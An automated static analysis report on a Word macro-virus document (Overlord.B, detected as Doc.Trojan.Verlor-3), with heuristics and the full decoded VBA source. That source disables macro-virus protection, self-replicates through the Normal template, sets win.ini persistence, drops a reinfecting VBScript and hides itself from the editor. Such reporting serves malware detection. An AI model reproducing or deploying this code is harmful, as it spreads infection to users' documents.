Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 09760bcaaafc72c8…

MALICIOUS

Office (OLE)

45.0 KB Created: 2000-08-29 10:39:00 Authoring application: Microsoft Word 8.0 First seen: 2015-09-18
MD5: 123cf3d06e498e3279dbbd5fdb990380 SHA-1: fc0542bf6de79b3253ae23460dd18a7e5283d012 SHA-256: 09760bcaaafc72c8745b9348e89f04f11b73728586e3cff05255823be8a15793
304 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains legacy WordBasic macro-virus markers and VBA macros, including AutoOpen and Auto_Close, which are indicative of malicious intent. The critical heuristic 'OLE_VBA_MACRO_VIRUS_REPLICATION' suggests self-replication and AV tampering. The script attempts to disable virus protection and replicate its code by exporting the 'Module' to 'C:\WINDOWS\TEMP\tempad.dll' and 'C:\WINDOWS\TEMP\tempnt.dll', which are likely stages of a malware infection.

Heuristics 8

  • ClamAV: Doc.Trojan.Verlor-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Verlor-3
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Options.VirusProtection = False
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Print #1, "Set WordObj = CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    windir = Environ("windir")
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 27756 bytes
SHA-256: 4902b1b8a2181a983dc5e2592116cff1e4a2fa3577d37eaba1875ba9c02ae325
Detection
ClamAV: Doc.Trojan.Verlor-3
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module"
 
Option Explicit
 
Private Declare Function GetWindowsDirectory Lib "kernel32" _
   Alias "GetWindowsDirectoryA" _
  (ByVal lpBuffer As String, ByVal nSize As Long) As Long
 
Private Function GetWinDir() As String
    Dim nSize As Long
    Dim tmp As String
   
   'pad the string for the return value and
   'set nSize equal to the size of the string
    tmp = Space$(256)
    nSize = Len(tmp)
 
   'call the API
    Call GetWindowsDirectory(tmp, nSize)
    
   'trim off the trailing null added by the API
    GetWinDir = TrimNull(tmp)
End Function
 
Private Function TrimNull(item As String)
    Dim pos As Integer
   
   'double check that there is a chr$(0) in the string
    pos = InStr(item, Chr$(0))
    If pos Then
          TrimNull = Left$(item, pos - 1)
    Else: TrimNull = item
    End If
End Function



Sub AutoClose()

'MyName = Overlord
'WrittenBy = f0re [UC/Skamwerks/DVC]
'Version = .B (1.1)
Dim line
On Error Resume Next
Dim windir
windir = Environ("windir")
If Dir(windir & "\tempad.dll") <> "" Then Kill (windir & "\tempad.dll")
If Dir(windir & "\tempnt.dll") <> "" Then Kill (windir & "\tempnt.dll")

Options.VirusProtection = False
Options.ConfirmConversions = False
Options.SaveNormalPrompt = False

If NormalTemplate.VBProject.VBComponents.item("Module").CodeModule.Lines(3, 1) <> "'MyName = Overlord" Then
ActiveDocument.VBProject.VBComponents("Module").Export (windir & "\tempad.dll")
NormalTemplate.VBProject.VBComponents.import (windir & "\tempad.dll")
NormalTemplate.Save
End If
If ActiveDocument.VBProject.VBComponents.item("Module").CodeModule.Lines(3, 1) <> "'MyName = Overlord" Then
NormalTemplate.VBProject.VBComponents("Module").Export (windir & "\tempnt.dll")
ActiveDocument.VBProject.VBComponents.import (windir & "\tempnt.dll")
ActiveDocument.SaveAs ActiveDocument.FullName
End If

If Dir("c:\Himem.sys") <> "" Then
Open "c:\Himem.sys" For Input As #1
Open "c:\Himem.sy_" For Output As #2
Do While Not EOF(1)
 Input #1, line
 If line <> ActiveDocument.FullName Then Print #2, line
Loop
Close #1
Close #2

Kill ("c:\Himem.sys")
FileCopy "c:\Himem.sy_", "c:\Himem.sys"
Kill ("c:\Himem.sy_")
End If

End Sub
Sub AutoOpen()

On Error Resume Next
Dim windir
windir = Environ("windir")

Open "c:\Himem.sys" For Append As #1
Print #1, ActiveDocument.FullName
Close #1

End Sub

Sub Stealth()
On Error Resume Next
Dim windir, line
windir = Environ("windir")

System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\software\", "RegisteredOwner") = "the Overlord"

Open windir & "\win.ini" For Input As #1
Open "c:\win._ni" For Output As #2
Do While Not EOF(1)
 Line Input #1, line
 If line = "[windows]" Then
  Print #2, line
  Print #2, "run = " & windir & "\overlord.b.vbs"
 Else
  Print #2, line
 End If
Loop
Close #1
Close #2

FileCopy "c:\win._ni", windir & "\win.ini"
Kill ("c:\win._ni")

If Dir(windir & "\overlord.b.vbs") <> "" Then Kill (windir & "\overlord.b.vbs")

Open "c:\windows\overlord.b.vbs" For Append As #1
Print #1, "On error resume next"
Print #1, ""
Print #1, "Set WordObj = CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
Print #1, "WordObj.Options.SaveNormalPrompt = False"
Print #1, "WordObj.NormalTemplate.VBProject.VBComponents.remove WordObj.NormalTemplate.VBProject.VBComponents(" & Chr(34) & "Module" & Chr(34) & ")"
Print #1, "WordObj.NormalTemplate.save"
Print #1, "WordObj.NormalTemplate.VBProject.VBComponents.import (" & Chr(34) & windir & "\overlord.b.dll" & Chr(34) & ")"
Print #1, "WordObj.NormalTemplate.save"
Print #1, ""
Print #1, "Dim FSO"
Print #1, "Set FSO = CreateObject(" & Chr(34) & "Scripting.FileSystemObject" & Chr(34) & ")"
Print #1, "set a =  FSO.OpenTextFile(" & Chr(34) & "c:\himem.sys" & Chr(34) & ", 1, True)"
Print #1, "contents = a.readall()"
Print #1, "a.close"
Print #1, "set b =  FSO.OpenTextFile(" & Chr(34) & "c:\himem.dll" & Chr(34) & ", 2, True)"
Print #1, "b.write(contents)"
Print #1, "b.close"
Print #1, "set a =  FSO.OpenTextFile(" & Chr(34) & "c:\himem.dll" & Chr(34) & ", 1, True)"
Print #1, "Do While a.atendofstream <> True"
Print #1, "documentname = a.readline"
Print #1, "If documentname <> " & Chr(34) & Chr(34) & " then"
Print #1, "WordObj.Documents.open (documentname)"
Print #1, "WordObj.activedocument.save"
Print #1, "WordObj.activedocument.close"
Print #1, "End if"
Print #1, "Loop"
Print #1, "a.close"
Print #1, "set NT = " & Chr(34) & Chr(34)
Print #1, "WordObj.Quit"
Print #1, "fso.deletefile" & Chr(34) & "c:\himem.sys" & Chr(34)
Print #1, "fso.deletefile" & Chr(34) & "c:\himem.dll" & Chr(34)
Close #1

NormalTemplate.VBProject.VBComponents("Module").Export (windir & "\overlord.b.dll")

End Sub
Sub ViewVBCode()
Dim docnumber, x
On Error Resume Next

Call Stealth

NormalTemplate.VBProject.VBComponents("Module").CodeModule.deletelines 1, NormalTemplate.VBProject.VBComponents("Module").CodeModule.CountOfLines
NormalTemplate.Saved = True
NormalTemplate.VBProject.VBComponents.Remove NormalTemplate.VBProject.VBComponents("Module")
NormalTemplate.Saved = True

docnumber = Application.Documents.Count
If docnumber >= 1 Then
For x = 1 To docnumber
Documents(x).VBProject.VBComponents("Module").CodeModule.deletelines 1, Documents(x).VBProject.VBComponents("Module").CodeModule.CountOfLines
Documents(x).Saved = True
Documents(x).VBProject.VBComponents.Remove Documents(x).VBProject.VBComponents("Module")
Documents(x).Saved = True
Next x
End If

Application.ShowVisualBasicEditor = True

End Sub
Sub ToolsMacro()
Dim x, y, codent, docnumber, codead

On Error Resume Next

For x = 1 To NormalTemplate.VBProject.VBComponents("Module").CodeModule.CountOfLines
 codent = codent & NormalTemplate.VBProject.VBComponents("Module").CodeModule.Lines(x, 1) & Chr(13)
Next x
NormalTemplate.VBProject.VBComponents("Module").CodeModule.deletelines 1, NormalTemplate.VBProject.VBComponents("Module").CodeModule.CountOfLines
NormalTemplate.Saved = True

docnumber = Application.Documents.Count
If docnumber >= 1 Then
 For y = 1 To ActiveDocument.VBProject.VBComponents("Module").CodeModule.CountOfLines
  codead = codead & ActiveDocument.VBProject.VBComponents("Module").CodeModule.Lines(y, 1) & Chr(13)
 Next y
 For x = 1 To docnumber
 Documents(x).VBProject.VBComponents("Module").CodeModule.deletelines 1, Documents(x).VBProject.VBComponents("Module").CodeModule.CountOfLines
 Documents(x).Saved = True
 Next x
End If

Application.Dialogs(wdDialogToolsMacro).Show

If Application.ShowVisualBasicEditor = False Then
 NormalTemplate.VBProject.VBComponents("Module").CodeModule.InsertLines 1, codent
 NormalTemplate.Save
 
If docnumber >= 1 Then
For x = 1 To docnumber
Documents(x).VBProject.VBComponents("Module").CodeModule.InsertLines 1, codead
Documents(x).SaveAs Documents(x).FullName
Next x
End If
End If
End Sub

'Put this code in a module called "Module". This is another version of overlord.
'It uses a different stealth mechanism. Again however not perfect stealth,
'but perhaps also a nice attempt i hope :).



' Processing file: /tmp/qstore_1g2ss6iz
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/Module - 12829 bytes
' Line #0:
' Line #1:
' 	Option  (Explicit)
' Line #2:
' Line #3:
' 	LineCont 0x0008 06 00 03 00 08 00 02 00
' 	FuncDefn (Private Declare Function GetWindowsDirectory Lib "kernel32" (ByVal lpBuffer As String, ByVal nSize As Long) As Long)
' Line #4:
' Line #5:
' 	FuncDefn (Private Function GetWinDir() As String)
' Line #6:
' 	Dim 
' 	VarDefn nSize (As Long)
' Line #7:
' 	Dim 
' 	VarDefn tmp (As String)
' Line #8:
' Line #9:
' 	QuoteRem 0x0003 0x0027 "pad the string for the return value and"
' Line #10:
' 	QuoteRem 0x0003 0x0029 "set nSize equal to the size of the string"
' Line #11:
' 	LitDI2 0x0100 
' 	ArgsLd Space$ 0x0001 
' 	St tmp 
' Line #12:
' 	Ld tmp 
' 	FnLen 
' 	St nSize 
' Line #13:
' Line #14:
' 	QuoteRem 0x0003 0x000C "call the API"
' Line #15:
' 	Ld tmp 
' 	Ld nSize 
' 	ArgsCall (Call) GetWindowsDirectory 0x0002 
' Line #16:
' Line #17:
' 	QuoteRem 0x0003 0x002B "trim off the trailing null added by the API"
' Line #18:
' 	Ld tmp 
' 	ArgsLd TrimNull 0x0001 
' 	St GetWinDir 
' Line #19:
' 	EndFunc 
' Line #20:
' Line #21:
' 	FuncDefn (Private Function TrimNull(item As String))
' Line #22:
' 	Dim 
' 	VarDefn pos (As Integer)
' Line #23:
' Line #24:
' 	QuoteRem 0x0003 0x0032 "double check that there is a chr$(0) in the string"
' Line #25:
' 	Ld item 
' 	LitDI2 0x0000 
' 	ArgsLd Chr$ 0x0001 
' 	FnInStr 
' 	St pos 
' Line #26:
' 	Ld pos 
' 	IfBlock 
' Line #27:
' 	Ld item 
' 	Ld pos 
' 	LitDI2 0x0001 
' 	Sub 
' 	ArgsLd LBound$ 0x0002 
' 	St TrimNull 
' Line #28:
' 	ElseBlock 
' 	BoS 0x0000 
' 	Ld item 
' 	St TrimNull 
' Line #29:
' 	EndIfBlock 
' Line #30:
' 	EndFunc 
' Line #31:
' Line #32:
' Line #33:
' Line #34:
' 	FuncDefn (Sub AutoClose())
' Line #35:
' Line #36:
' 	QuoteRem 0x0000 0x0011 "MyName = Overlord"
' Line #37:
' 	QuoteRem 0x0000 0x0023 "WrittenBy = f0re [UC/Skamwerks/DVC]"
' Line #38:
' 	QuoteRem 0x0000 0x0012 "Version = .B (1.1)"
' Line #39:
' 	Dim 
' 	VarDefn Like
' Line #40:
' 	OnError (Resume Next) 
' Line #41:
' 	Dim 
' 	VarDefn windir
' Line #42:
' 	LitStr 0x0006 "windir"
' 	ArgsLd Environ 0x0001 
' 	St windir 
' Line #43:
' 	Ld windir 
' 	LitStr 0x000B "\tempad.dll"
' 	Concat 
' 	ArgsLd Dir 0x0001 
' 	LitStr 0x0000 ""
' 	Ne 
' 	If 
' 	BoSImplicit 
' 	Ld windir 
' 	LitStr 0x000B "\tempad.dll"
' 	Concat 
' 	Paren 
' 	ArgsCall Kill 0x0001 
' 	EndIf 
' Line #44:
' 	Ld windir 
' 	LitStr 0x000B "\tempnt.dll"
' 	Concat 
' 	ArgsLd Dir 0x0001 
' 	LitStr 0x0000 ""
' 	Ne 
' 	If 
' 	BoSImplicit 
' 	Ld windir 
' 	LitStr 0x000B "\tempnt.dll"
' 	Concat 
' 	Paren 
' 	ArgsCall Kill 0x0001 
' 	EndIf 
' Line #45:
' Line #46:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #47:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt ConfirmConversions 
' Line #48:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #49:
' Line #50:
' 	LitDI2 0x0003 
' 	LitDI2 0x0001 
' 	LitStr 0x0006 "Module"
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	LitStr 0x0012 "'MyName = Overlord"
' 	Ne 
' 	IfBlock 
' Line #51:
' 	Ld windir 
' 	LitStr 0x000B "\tempad.dll"
' 	Concat 
' 	Paren 
' 	LitStr 0x0006 "Module"
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	ArgsMemCall Export 0x0001 
' Line #52:
' 	Ld windir 
' 	LitStr 0x000B "\tempad.dll"
' 	Concat 
' 	Paren 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemCall import 0x0001 
' Line #53:
' 	Ld NormalTemplate 
' 	ArgsMemCall Save 0x0000 
' Line #54:
' 	EndIfBlock 
' Line #55:
' 	LitDI2 0x0003 
' 	LitDI2 0x0001 
' 	LitStr 0x0006 "Module"
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	LitStr 0x0012 "'MyName = Overlord"
' 	Ne 
' 	IfBlock 
' Line #56:
' 	Ld windir 
' 	LitStr 0x000B "\tempnt.dll"
' 	Concat 
' 	Paren 
' 	LitStr 0x0006 "Module"
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	ArgsMemCall Export 0x0001 
' Line #57:
' 	Ld windir 
' 	LitStr 0x000B "\tempnt.dll"
' 	Concat 
' 	Paren 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemCall import 0x0001 
' Line #58:
' 	Ld ActiveDocument 
' 	MemLd FullName 
' 	Ld ActiveDocument 
' 	ArgsMemCall SaveAs 0x0001 
' Line #59:
' 	EndIfBlock 
' Line #60:
' Line #61:
' 	LitStr 0x000C "c:\Himem.sys"
' 	ArgsLd Dir 0x0001 
' 	LitStr 0x0000 ""
' 	Ne 
' 	IfBlock 
' Line #62:
' 	LitStr 0x000C "c:\Himem.sys"
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitDefault 
' 	Open (For Input)
' Line #63:
' 	LitStr 0x000C "c:\Himem.sy_"
' 	LitDI2 0x0002 
' 	Sharp 
' 	LitDefault 
' 	Open (For Output)
' Line #64:
' 	LitDI2 0x0001 
' 	ArgsLd EOF 0x0001 
' 	Not 
' 	DoWhile 
' Line #65:
' 	LitDI2 0x0001 
' 	Sharp 
' 	Input 
' 	Ld Like 
' 	InputItem 
' 	InputDone 
' Line #66:
' 	Ld Like 
' 	Ld ActiveDocument 
' 	MemLd FullName 
' 	Ne 
' 	If 
' 	BoSImplicit 
' 	LitDI2 0x0002 
' 	Sharp 
' 	PrintChan 
' 	Ld Like 
' 	PrintItemNL 
' 	EndIf 
' Line #67:
' 	Loop 
' Line #68:
' 	LitDI2 0x0001 
' 	Sharp 
' 	Close 0x0001 
' Line #69:
' 	LitDI2 0x0002 
' 	Sharp 
' 	Close 0x0001 
' Line #70:
' Line #71:
' 	LitStr 0x000C "c:\Himem.sys"
' 	Paren 
' 	ArgsCall Kill 0x0001 
' Line #72:
' 	LitStr 0x000C "c:\Himem.sy_"
' 	LitStr 0x000C "c:\Himem.sys"
' 	ArgsCall FileCopy 0x0002 
' Line #73:
' 	LitStr 0x000C "c:\Himem.sy_"
' 	Paren 
' 	ArgsCall Kill 0x0001 
' Line #74:
' 	EndIfBlock 
' Line #75:
' Line #76:
' 	EndSub 
' Line #77:
' 	FuncDefn (Sub AutoOpen())
' Line #78:
' Line #79:
' 	OnError (Resume Next) 
' Line #80:
' 	Dim 
' 	VarDefn windir
' Line #81:
' 	LitStr 0x0006 "windir"
' 	ArgsLd Environ 0x0001 
' 	St windir 
' Line #82:
' Line #83:
' 	LitStr 0x000C "c:\Himem.sys"
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitDefault 
' 	Open (For Append)
' Line #84:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	Ld ActiveDocument 
' 	MemLd FullName 
' 	PrintItemNL 
' Line #85:
' 	LitDI2 0x0001 
' 	Sharp 
' 	Close 0x0001 
' Line #86:
' Line #87:
' 	EndSub 
' Line #88:
' Line #89:
' 	FuncDefn (Sub Stealth())
' Line #90:
' 	OnError (Resume Next) 
' Line #91:
' 	Dim 
' 	VarDefn windir
' 	VarDefn Like
' Line #92:
' 	LitStr 0x0006 "windir"
' 	ArgsLd Environ 0x0001 
' 	St windir 
' Line #93:
' Line #94:
' 	LitStr 0x000C "the Overlord"
' 	LitStr 0x0000 ""
' 	LitStr 0x001C "HKEY_LOCAL_MACHINE\software\"
' 	LitStr 0x000F "RegisteredOwner"
' 	Ld System 
' 	ArgsMemSt PrivateProfileString 0x0003 
' Line #95:
' Line #96:
' 	Ld windir 
' 	LitStr 0x0008 "\win.ini"
' 	Concat 
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitDefault 
' 	Open (For Input)
' Line #97:
' 	LitStr 0x000A "c:\win._ni"
' 	LitDI2 0x0002 
' 	Sharp 
' 	LitDefault 
' 	Open (For Output)
' Line #98:
' 	LitDI2 0x0001 
' 	ArgsLd EOF 0x0001 
' 	Not 
' 	DoWhile 
' Line #99:
' 	LitDI2 0x0001 
' 	Ld Like 
' 	LineInput 
' Line #100:
' 	Ld Like 
' 	LitStr 0x0009 "[windows]"
' 	Eq 
' 	IfBlock 
' Line #101:
' 	LitDI2 0x0002 
' 	Sharp 
' 	PrintChan 
' 	Ld Like 
' 	PrintItemNL 
' Line #102:
' 	LitDI2 0x0002 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0006 "run = "
' 	Ld windir 
' 	Concat 
' 	LitStr 0x000F "\overlord.b.vbs"
' 	Concat 
' 	PrintItemNL 
' Line #103:
' 	ElseBlock 
' Line #104:
' 	LitDI2 0x0002 
' 	Sharp 
' 	PrintChan 
' 	Ld Like 
' 	PrintItemNL 
' Line #105:
' 	EndIfBlock 
' Line #106:
' 	Loop 
' Line #107:
' 	LitDI2 0x0001 
' 	Sharp 
' 	Close 0x0001 
' Line #108:
' 	LitDI2 0x0002 
' 	Sharp 
' 	Close 0x0001 
' Line #109:
' Line #110:
' 	LitStr 0x000A "c:\win._ni"
' 	Ld windir 
' 	LitStr 0x0008 "\win.ini"
' 	Concat 
' 	ArgsCall FileCopy 0x0002 
' Line #111:
' 	LitStr 0x000A "c:\win._ni"
' 	Paren 
' 	ArgsCall Kill 0x0001 
' Line #112:
' Line #113:
' 	Ld windir 
' 	LitStr 0x000F "\overlord.b.vbs"
' 	Concat 
' 	ArgsLd Dir 0x0001 
' 	LitStr 0x0000 ""
' 	Ne 
' 	If 
' 	BoSImplicit 
' 	Ld windir 
' 	LitStr 0x000F "\overlord.b.vbs"
' 	Concat 
' 	Paren 
' 	ArgsCall Kill 0x0001 
' 	EndIf 
' Line #114:
' Line #115:
' 	LitStr 0x0019 "c:\windows\overlord.b.vbs"
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitDefault 
' 	Open (For Append)
' Line #116:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0014 "On error resume next"
' 	PrintItemNL 
' Line #117:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0000 ""
' 	PrintItemNL 
' Line #118:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x001B "Set WordObj = CreateObject("
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0010 "Word.Application"
' 	Concat 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0001 ")"
' 	Concat 
' 	PrintItemNL 
' Line #119:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0028 "WordObj.Options.SaveNormalPrompt = False"
' 	PrintItemNL 
' Line #120:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0063 "WordObj.NormalTemplate.VBProject.VBComponents.remove WordObj.NormalTemplate.VBProject.VBComponents("
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0006 "Module"
' 	Concat 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0001 ")"
' 	Concat 
' 	PrintItemNL 
' Line #121:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x001B "WordObj.NormalTemplate.save"
' 	PrintItemNL 
' Line #122:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0036 "WordObj.NormalTemplate.VBProject.VBComponents.import ("
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	Ld windir 
' 	Concat 
' 	LitStr 0x000F "\overlord.b.dll"
' 	Concat 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0001 ")"
' 	Concat 
' 	PrintItemNL 
' Line #123:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x001B "WordObj.NormalTemplate.save"
' 	PrintItemNL 
' Line #124:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0000 ""
' 	PrintItemNL 
' Line #125:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0007 "Dim FSO"
' 	PrintItemNL 
' Line #126:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0017 "Set FSO = CreateObject("
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x001A "Scripting.FileSystemObject"
' 	Concat 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0001 ")"
' 	Concat 
' 	PrintItemNL 
' Line #127:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x001A "set a =  FSO.OpenTextFile("
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x000C "c:\himem.sys"
' 	Concat 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x000A ", 1, True)"
' 	Concat 
' 	PrintItemNL 
' Line #128:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0016 "contents = a.readall()"
' 	PrintItemNL 
' Line #129:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0007 "a.close"
' 	PrintItemNL 
' Line #130:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x001A "set b =  FSO.OpenTextFile("
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x000C "c:\himem.dll"
' 	Concat 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x000A ", 2, True)"
' 	Concat 
' 	PrintItemNL 
' Line #131:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0011 "b.write(contents)"
' 	PrintItemNL 
' Line #132:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0007 "b.close"
' 	PrintItemNL 
' Line #133:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x001A "set a =  FSO.OpenTextFile("
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x000C "c:\himem.dll"
' 	Concat 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x000A ", 1, True)"
' 	Concat 
' 	PrintItemNL 
' Line #134:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0020 "Do While a.atendofstream <> True"
' 	PrintItemNL 
' Line #135:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0019 "documentname = a.readline"
' 	PrintItemNL 
' Line #136:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0013 "If documentname <> "
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0005 " then"
' 	Concat 
' 	PrintItemNL 
' Line #137:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0025 "WordObj.Documents.open (documentname)"
' 	PrintItemNL 
' Line #138:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x001B "WordObj.activedocument.save"
' 	PrintItemNL 
' Line #139:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x001C "WordObj.activedocument.close"
' 	PrintItemNL 
' Line #140:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0006 "End if"
' 	PrintItemNL 
' Line #141:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0004 "Loop"
' 	PrintItemNL 
' Line #142:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0007 "a.close"
' 	PrintItemNL 
' Line #143:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0009 "set NT = "
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	PrintItemNL 
' Line #144:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x000C "WordObj.Quit"
' 	PrintItemNL 
' Line #145:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x000E "fso.deletefile"
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x000C "c:\himem.sys"
' 	Concat 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	PrintItemNL 
' Line #146:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x000E "fso.deletefile"
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x000C "c:\himem.dll"
' 	Concat 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	PrintItemNL 
' Line #147:
' 	LitDI2 0x0001 
' 	Sharp 
' 	Close 0x0001 
' Line #148:
' Line #149:
' 	Ld windir 
' 	LitStr 0x000F "\overlord.b.dll"
' 	Concat 
' 	Paren 
' 	LitStr 0x0006 "Module"
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	ArgsMemCall Export 0x0001 
' Line #150:
' Line #151:
' 	EndSub 
' Line #152:
' 	FuncDefn (Sub ViewVBCode())
' Line #153:
' 	Dim 
' 	VarDefn docnumber
' 	VarDefn x
' Line #154:
' 	OnError (Resume Next) 
' Line #155:
' Line #156:
' 	ArgsCall (Call) Stealth 0x0000 
…

Open this report in the interactive analyzer, or submit your own file for analysis.